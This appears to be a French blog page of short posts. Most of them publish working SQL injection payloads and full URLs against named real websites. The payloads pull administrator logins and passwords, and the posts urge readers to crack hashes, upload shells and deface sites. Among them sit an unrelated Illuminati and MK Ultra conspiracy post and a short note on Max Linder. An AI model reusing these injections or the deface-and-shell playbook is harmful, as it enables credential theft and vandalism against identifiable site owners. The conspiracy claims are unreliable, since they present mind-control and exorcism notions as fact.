hello linux
hello la presse
encore une vulnerabilite
le site dkkgroup.com est vulnerable
je poste l’injection sql qui affiche les donnees sensible à l’ecran
le panel de l’admin peut etre facilement decouvert
à vos cpu pour cracker le mot de passe
et vous etes un hackeur
hello la presse
hello linux
je poste pour la posterite une nouvelle serie d’injection sql
il ne vous reste plus que pouvoir decrypter le mot de passe
le panel d’administration est le plus souvent visible
à vos crayons
hello linux
hello la presse
encore des vulnerabilites sql
le site moreanartscenter.org est vulnerable le password crypte peut etre facilement consulte
il est crypter et je ne le connais pas decrypter
le panel d’administration peut etre facilement trouve
il ne faut plus que lancer les outils de decryptage de mot de passe et vous etes un hackeur
à vos cpu pour le decryptage
un upload de shell
et une defiguration de la page index
et vous voila hackeur
hello la presse
hello linux
je viens de finir de realiser une attaque sql sur le site infoservis.net
la base de donnee est vulnerable les donnees à l’interieur sont consultable par un tier
je vous poste donc l’url qui affiche à l’ecran les login et password de la base
les password administratif peuvent etre facilement decrypter
il est necessaire apres de se connecter à l’interface d’administration
uploader un shell pour permettre le defacement de la page d index
un crawl avec un spider pour tenter de detecter l’interface de l’admin
et hop upload du shell et vous etes un hacker
bonne realisation
Bonjour la presse
La première partie de l’interview d’une ancienne adepte du groupe Illuminati
et datant du 17 Janvier 2006 a été postée pour la première fois hier sur internet:
Interview radio exclusive de Svali (2006) Part1… par JaneBurgermeister
(voir également liens sous la vidéo)
Pour avoir avoir écumé un bon nombre de vidéos de ce genre, de Mengele à MK Ultra,
des témoignages d’ »alters » militaires, d’ »alters » sexuels, les dossiers de pédophilie,
l’histoire des sociétés secrètes, les escathologies chrétiennes et musulmanes,
Il me semble que ce témoignage offre une nouvelle lumière sur la marche de l’Histoire,
son déroulement. Aussi, nous donne-t-il un autre prisme de lecture sur le fonctionnement
des appareils politiques, religieux, économiques, financiers, militaires et médiatiques, leurs
représentants. Pourquoi ce mensonge systématique et généralisé ?
En outre, il pose la question du combat. Si une grande partie de nos dirigeants sont
réellement prisonniers d’un endoctrinement puissant, pratiqué dès leur plus jeune âge,
faut-il encore les voir comme des ennemis ? N’y a-t-il pas une arme supérieure capable
de les dé-programmer ? Ne faudrait-il pas avoir recours à un exorcisme pur et simple ?
N’y a-t-il pas dans ce pays, des prêtres encore intègres, capables de pratiquer un tel rituel ?
Des prières répétées, conscientes et assidues n’auraient-elles pas une soudaine efficacité ?
Et comment démasquer les personnages médiatiques sous emprise ?
N’avons-nous pas notre « bon sens », notre intuition, notre flair, notre sonar, nos anges gardiens ?
Ou ce que Sheikh Imran Hosein appelle l’état de « Muhmin », parlant de celui qui voit avec le coeur ?
Et divulguer ce genre d’informations ? Est-ce un risque d’être discrédité ?
Ou une autre façon de comprendre l’Empire, de comprendre Blythe Masters, de comprendre Jean ?
Peut-être même serait-ce une voie pour vivifier la foi des tièdes…
Vive Jésus Christ !
Bien à vous.
bonjour la presse
Bonsoir,
Je viens de découvrir l’histoire de MAX LINDER
grâce à une vidéo toute récente sur la toile.
A faire partager.
Bien à vous.
Première star internationale du Cinéma en 1910,
Gabriel Leuvielle, dit Max Linder, réalisateur et acteur français né en 1883 en Gironde,
fut notamment l’inspirateur du personnage de Charlot (Charlie Chaplin).
En Juillet 1925, il est élu Président de la Société des Auteurs de Films.
Lors d’une assemblée réunissant journalistes et artistes, Max mentionnera:
« Messieurs, à la base du film, il y a le scénario et l’Idée. La France, terre classique de l’imagination,
dès que vous le voudrez, l’emportera dans le domaine cinématographique. »
Seuls une centaine de films subsistent aujourd’hui sur les cinq cents qu’il a tournés.
Son histoire est ici résumée en 17 minutes:
bnojour linux
bonjour la presse
je publie des nouveaux exploits
ils sont fournis pour signaler les vulnérabilités et les mots de passe
je vous invite à ne pas pirater le site des associations de l’Himalaya
ils possedent surement que peu de ressource
je leur ai bien entendu proposer de les aider
je n’ai pas reçu de reponse de leur part
bonjour linux
bonjour la presse
je vous le répète … tout bon informaticien se doit de verifier ces arguments contre les injections sql , c’est facile des logiciels existent pour cela
ce ne pas tester ces arguments c’est mettre en peril le site le defacement et le vol d’informations sont possible presque dans tout les cas
je vous poste donc une serie d’exploits sans grande prétention
pour ne pas charger cette page je poste les exploits sur pastebin
bonjour la presse
bonjour linux
je vous ecris dans ce beau jour de noel en postant mes derniers exploits
et je suis tres fier de moi le 24 decembre à 19h en france j’ai reçu un mail d’une universite du canada me remerciant pour le signalement d’une vulnerabilite sur leur site . le responsable m’a dit dans le mail qu’il corrigerait le faille de securite le plus vite possible car critique
on apprécie le moral des informaticiens qui acceptent de travailler sur leur code un 24 décembre le soir
et moi bien c’est derniers jours j’ai ecrit plusieurs exploits sql
je vous en donne le detail
main.php?ID=21 LIMIT 0,1 UNION ALL SELECT 2870,CONCAT(Login,0x3a,Profil,0x3a,PWD,0x3a),2870,2870,2870 from log#
http://www.moroccansahara.net/
le panel d’admin e ete retire suite à de nombreux piratages de ce site
prod_detail.php?id=16 LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(firstname,0x3a,password,0x3a,username,0x3a),NULL,NULL,NULL,NULL from Users–#
http://www.emergingdesignnetworks.com/
la aussi les mots de passe sont en clair et une authentification depuis une ip normale ( je sous entends pas une ip tor car souvent bani pour une plus grande securite )
un defacement du site semble possible
theme.php?id=-3613 UNION ALL SELECT CONCAT(password,0x3a,tmpkey,0x3a,username,0x3a),3463 from members#
http://www.dosgraveyard.com/
le mot de passe est crypter et le panel d’administration semble absent
prod_detail.php?id=-1463 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(access,0x3a,email,0x3a,fname,0x3a,id,0x3a,lname,0x3a,password,0x3a,status,0x3a),NULL,NULL,NULL,NULL,NULL,NULL from tblAdmin–#
http://www.a-k-a.net/
la aussi le panal d’administration a ete retire mais des recherches plus poussees permettent theoriquement un login sur l’extranet du site la connexion peut etre filtre au niveau ip
le mot de passe est affiche en clair
newsone.php?id=-1734 UNION ALL SELECT NULL,NULL,NULL,CONCAT(kod,0x3a,nazwa,0x3a,pass,0x3a),NULL from users–#
http://www.szkolamarzen.pl/gim/
la un panel d’administration est disponible il suffit de decrypter le mot de passe
des restrictions aux niveaux ip sont tres souvent realisees
le defacement du site semble possible
à vos crayons
bonjour la presse
bonjour linux
je finis ma journee de travail par l’ecriture de 2 exploits
les sites blackandbrown.com.pk comme alshahbaa.com sont vulnerables aux injections sql
alors des petis tests un peu de savoir faire et on arrive rapidement à la construction de 2 exploits simple
dans le cas du site blackandbrown.com.pk cela permet d afficher le mot de passe et l’id de l’administrateur du site
voici l exploit
http://www.blackandbrown.com.pk/news_view.php?id=-1%20UNION%20ALL%20SELECT%201,2,3,group_concat%28id%20,0x3a,pass,0x3a,user,0x3a%29,4%20from%20login#
le site alshahbaa.com ne contient aucune information sensible
mais on peut arriver à faire un petit exploit qui affiche des references privees à l’ecran
http://www.alshahbaa.com/news_view.php?id=-1%20UNION%20ALL%20SELECT%201,2,3,4,group_concat%28asl_armark,0x3a,asl_arname,0x3a,asl_id%20,0x3a,asl_mark,0x3a,asl_name,0x3a,asl_number,0x3a%29,6%20from%20asool#
j’ai bien entendu contacter les admins des sites pour leur proposer mon aide
j’attends une reponse
à vos crayons
Loading ...